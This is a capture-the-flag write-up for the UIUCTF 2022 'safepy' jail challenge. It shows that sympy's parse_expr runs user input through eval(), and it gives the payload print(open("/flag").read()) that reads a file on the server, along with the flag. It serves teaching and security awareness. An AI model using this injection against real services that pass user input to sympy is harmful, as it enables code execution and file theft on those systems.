Rating: 5.0
# UIUCTF 2022 - safepy Writeup
- Type - Jail
- Name - safepy
- Points - 50
## Description
My calculator won't be getting pwned again...
$ nc safepy.chal.uiuc.tf 1337
author: tow_nater
## Writeup
When you unzip the provided file for the challenge, you'll get the Python script run server-side along with some supporting files for the Docker setup. Outside of [line 28 of the Dockerfile](https://github.com/BYU-CTF-group/writeups/blob/main/UIUCTF_2022/safepy/Dockerfile) that shows the flag is located at `/flag`, the only useful file is `main.py`. The script is pretty short:
from sympy import *
def parse(expr):
# learned from our mistake... let's be safe now
# https://stackoverflow.com/questions/33606667/from-string-to-sympy-expression
# return sympify(expr)
# https://docs.sympy.org/latest/modules/parsing.html
return parse_expr(expr)
print('Welcome to the derivative (with respect to x) solver!')
user_input = input('Your expression: ')
expr = parse(user_input)
deriv = diff(expr, Symbol('x'))
print('The derivative of your expression is:')
Our input is taken, parsed using `parse_expr`, and then stuck into the `diff` function with the output printed out. The `parse()` function gives us two very helpful links, [one](https://docs.sympy.org/latest/modules/parsing.html) to the documentation and [another](https://stackoverflow.com/questions/33606667/from-string-to-sympy-expression) about why `sympify` is dangerous. Reading through this article gave me an idea for how to approach this - `sympify` used `eval()` internally, so if I could get either `diff` or `parse_expr` to do the same, that would be great!
While reading through the documentation provided, I read that an optional parameter for `parse_expr` was `evaluate`, with the default setting to True. This means that, by default, any expressions will be simplified if possible, which means it will use `eval()` inside of it.
I started out with a test payload to see what it would do if I just input whatever code I wanted to - `print('a')`:
$ nc safepy.chal.uiuc.tf 1337
== proof-of-work: disabled ==
Welcome to the derivative (with respect to x) solver!
Your expression: print('a')
Since it looked like it ran the code, I decided to just put in a payload to print out the flag:
nc safepy.chal.uiuc.tf 1337
== proof-of-work: disabled ==
Welcome to the derivative (with respect to x) solver!
Your expression: print(open("/flag").read())
And it worked!!
**Flag:** `uiuctf{na1v3_0r_mal1ci0u5_chang3?}`
## Real-World Application
My favorite part of this challenge is the real world application. This entire question was completely based off of a StackOverflow answer, and - as everyone knows - StackOverflow is the *source* for all programming information. This particular answer was from someone who said putting user-controlled input to `sympify()` is dangerous since it uses `eval` natively, so the `parse_expr` function should be used instead (implying this one was safe). As our problem demonstrated, that was **not** the case - `parse_expr` was just as dangerous as `sympify`. Did the user who submitted this answer know this? Not sure. But the moral of the story is **you can't always trust answers from random people on the internet**...